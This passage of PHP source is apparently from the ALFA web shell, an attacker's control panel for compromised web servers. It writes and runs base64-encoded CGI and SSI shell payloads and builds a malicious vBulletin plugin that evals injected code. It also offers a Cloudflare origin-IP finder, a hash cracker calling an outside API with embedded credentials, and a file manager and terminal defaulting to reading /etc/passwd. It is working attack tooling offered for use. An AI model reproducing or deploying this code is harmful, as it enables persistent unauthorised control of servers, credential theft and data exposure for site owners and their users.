3106 @chmod("alfacgiapi/".$name, 0755);
3107 return $temp;
3108}
3109function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
3110function alfaupdateheader(){
3111 if(!isset($_COOKIE["updateheader_data"])){
3112 $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
3113 $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
3114 $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);
3115 $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);
3116 if(@is_array(@json_decode($data,true))){
3117 __alfa_set_cookie("updateheader_data", $data);
3118 echo $data;
3119 }
3120 }else{
3121 echo $_COOKIE["updateheader_data"];
3122 }
3123}
3124function alfassiShell(){
3125alfahead();
3126echo '<div class=header>';
3127@mkdir('alfa_shtml',0755);
3128@chdir('alfa_shtml');
3129alfacgihtaccess('shtml');
3130$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
3131@__write_file('alfa_ssi.shtml',__get_resource($code));
3132@chmod("alfa_ssi.shtml",0755);
3133echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
3134echo '</div>';
3135alfafooter();
3136}
3137function alfacloudflare(){
3138alfahead();
3139AlfaNum(8,9,10,7,6,5,4,3);
3140echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
3141<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
3142if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
3143$url = $_POST['alfa1'];
3144if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
3145$url = preg_replace('/^(https?):\/\//', '', $url);
3146$url = "http://www.".$url;
3147}
3148$headers = @get_headers($url, 1);
3149$server = $headers['Server'];
3150$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
3151if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
3152if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
3153$url = explode($matches[0], $url);
3154$url = $url[1];}}
3155if(is_array($server))$server = $server[0];
3156echo __pre();
3157if(preg_match('/cloudflare/i', $server))
3158echo "\n[+] CloudFlare detected: {$server}\n<br>";
3159else
3160echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
3161echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
3162echo "[+] Searching for more IP addresses.\n\n<br><br>";
3163for($x=0;$x<count($subs);$x++){
3164$site = $subs[$x] . $url;
3165$ip = is_ipv4(gethostbyname($site));
3166if($ip == '(Null)')
3167continue;
3168echo "Trying {$site}: {$ip}\n<br>";
3169}
3170echo "\n[+] Finished.\n<br>";
3171}
3172echo '</div>';
3173alfafooter();
3174}
3175function is_ipv4($ip){
3176return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
3177}
3178function __alert($s){
3179echo '<center>'.__pre().$s.'</center>';
3180}
3181function create_table($data){
3182echo '<table border="1">';
3183foreach ($data as $key => $val){
3184$array = array();
3185foreach($val as $k => $v){
3186$array[$k] = $v;
3187}
3188echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
3189}
3190echo '</table>';
3191}
3192function alfaphp2xml(){
3193alfahead();
3194AlfaNum(8,9,10,7,6,5,4,3);
3195echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
3196<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
3197<input type='submit' name='go' value=' ' /></p></form></center>";
3198if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
3199echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
3200echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
3201echo '</textarea></center></p>';
3202}
3203echo '</center></div>';
3204alfafooter();
3205}
3206function alfacpcrack(){
3207alfahead();
3208echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
3209if($_POST['alfa1']=='dec'){
3210$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
3211echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
3212<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
3213foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
3214echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
3215if($_POST['alfa3'] == '>>'){
3216$hash = $_POST['alfa2'];
3217if(!empty($hash)){
3218$hash_type = $_POST['alfa4'];
3219$email = "solevisible@gmail.com";
3220$code = "7b9fa79f92c3cd96";
3221$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
3222$resp = @file_get_contents($target);
3223if($resp==''){
3224$get = new AlfaCURL();
3225$resp = $get->Send($target);
3226}
3227echo __pre().'<center>';
3228switch($resp){
3229 case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
3230 case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
3231 case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
3232 case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
3233}
3234if(substr($resp,0,4)!='CODE'&&$resp!=''){
3235echo "<b>Result: <font color='green'>".$resp."</font></b>";
3236}elseif(substr($resp,0,4)!='CODE'){
3237echo "<font color='red'>NoT Found</font><br />";
3238}
3239echo('</center>');
3240}
3241}
3242}
3243if($_POST['alfa1']=='analyzer'){
3244echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
3245<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
3246<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
3247if($_POST['alfa3'] == '>>'){
3248$hash = $_POST['alfa2'];
3249if(!empty($hash)){
3250$curl = new AlfaCURL();
3251$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
3252echo(__pre().'<center>');
3253if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
3254 echo('<font color="green">'.$s[1].'</font>');
3255}else{
3256 echo('<font color="red">Not Found...!</font>');
3257}
3258echo('</center><br>');
3259}
3260}
3261}
3262echo '</div>';
3263alfafooter();
3264}
3265function alfafooter(){
3266if(!isset($_POST['ajax'])){
3267echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
3268<tr>
3269<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
3270<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
3271<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
3272<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
3273</tr>
3274<tr>
3275<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
3276<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
3277</tr>
3278<tr>
3279<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>
3280</tr>
3281<tr>
3282<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
3283<input type='hidden' name='a' value='FilesMAn'>
3284<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
3285<input type='hidden' name='ajax' value='true'>
3286<input type='hidden' name='alfa1' value='uploadFile'>
3287<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
3288<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam © 2012-".date('Y')." ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></td>
3289</tr>
3290</table>
3291</div>
3292
3293<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>
3294
3295<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;overflow: auto;'></div></div></div></div>
3296
3297<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>
3298<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>
3299<div id='update-content'></div>
3300<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>
3301<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
3302<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
3303<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
3304<div id='rightclick_menu'>
3305 <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>
3306 <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>
3307 <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>
3308 <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>
3309 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>
3310 <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>
3311 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>
3312 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>
3313 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\"> Rename</a>
3314 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\"> Modify</a>
3315 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>
3316 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>
3317 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>
3318 <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>
3319</div>
3320<div id='alert-area' class='alert-area'></div>
3321<div class='cl-popup-fixed' style='display:none;'>
3322 <div id='shortcutMenu-holder'>
3323 <div class='popup-head'></div>
3324 <form autocomplete='off' onSubmit='return false;'>
3325 <label class='old-path-lbl'></label>
3326 <div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
3327 <label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>
3328 <input type='text' name='fname'>
3329 <div class='perm-table-holder'>
3330 <table>
3331 <tbody>
3332 <tr>
3333 <td><b>Mode</b></td>
3334 <td>User</td>
3335 <td>Group</td>
3336 <td>World</td>
3337 </tr>
3338 <tr>
3339 <td>Read</td>
3340 <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
3341 <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>
3342 <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
3343 </tr>
3344 <tr>
3345 <td>Write</td>
3346 <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>
3347 <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>
3348 <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>
3349 </tr>
3350 <tr>
3351 <td>Execute</td>
3352 <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>
3353 <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
3354 <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>
3355 </tr>
3356 <tr>
3357 <td>Permission</td>
3358 <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>
3359 <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>
3360 <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>
3361 </tr>
3362 </tbody>
3363 </table>
3364 </div>
3365
3366 </form>
3367 <div class='popup-foot'>
3368 <button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>
3369 <button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>
3370 </div>
3371 </div>
3372</div>";?>
3373<script>
3374var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(i){if(""===i||null==i)throw'"msg parameter is empty"';var a=document.querySelector(e),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("DIV"),l=document.createElement("A"),c=document.createElement("div"),s=document.createElement("IMG"),d=this;if(c.style.display="inline-block",c.style.marginRight="10px",o.style.display="inline-block",n.classList.add("alert-content"),n.innerText=i,l.classList.add("alert-close"),l.setAttribute("href","#"),r.classList.add("alert-box"),s.src=this.types[t.type].icon,s.style.width="30px",c.appendChild(s),r.appendChild(c),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,o.appendChild(u)}if(o.appendChild(n),r.appendChild(o),t.hideCloseButton&&void 0!==t.hideCloseButton||r.appendChild(l),t.hasOwnProperty("type")&&r.classList.add(this.types[t.type].class),a.appendChild(r),l.addEventListener("click",function(e){e.preventDefault(),d.hide(r)}),!t.persistent)var f=setTimeout(function(){d.hide(r),clearTimeout(f)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,i,a,r){void 0===i&&(i="success"),void 0===a&&(a=!1),void 0===r&&(r=1e4);var o={closeTime:r,persistent:a,type:i,hideCloseButton:!1};void 0!==t&&(o.title=t),new alfaAlertBox("#alert-area",o).show(e)}function alfaSyncMenuToOpt(e,t){var i="",a="",r=null;void 0!==t?(i="view_archive",a=e,r=location):(i=e.name,a=e.getAttribute("fname"),r=e),"extract"==i?(alfa_can_add_opt=!0,r.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+a),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==i?(alfa_can_add_opt=!0,r.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+a),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==i&&(alfa_can_add_opt=!0,r.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+a,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){setTimeout(function(){var t=e.value;d.querySelectorAll(".fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(t)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,i){if($("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var a="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+a+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+a+'" opt_id="'+a+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+a+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(a).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",a)});try{$(a).querySelector(".getconfig").setAttribute("base_id",a)}catch(e){}return a}$(t).innerHTML=e;var r=$("tab_"+t);null!=r&&((-1==r.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(r.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+r.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=i&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){alfa_before_do_action_id="",$("options_window").style.display="block";var i=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var a="",r=$("menu_opt_"+e).innerHTML;"plus"==e?r="Alfa+":"GetDisFunc"==e&&(r="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=i){var o=i.getAttribute("opt_count");null!=o?(a=parseInt(o)+1,i.setAttribute("opt_count",a)):(a=1,i.setAttribute("opt_count",a))}var n="option_"+e+a;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+n+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+n+'" onclick="optionsTabController(this);" title="'+r+'" id="tab_'+n+'" class="tab_name tab_is_active">'+r+' <img opt_id="'+n+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(n).classList.toggle("option_is_active"),d.querySelectorAll("#"+n+" form, #"+n+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+a+'");'+i),t.setAttribute("opt_id",e+a)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+a+'");'+i)}});try{$(n).querySelector(".getconfig").setAttribute("base_id",e+a)}catch(e){}return e+a}i.innerHTML=t;var l=$("tab_option_"+e);null!=l&&((-1==l.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",l.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var 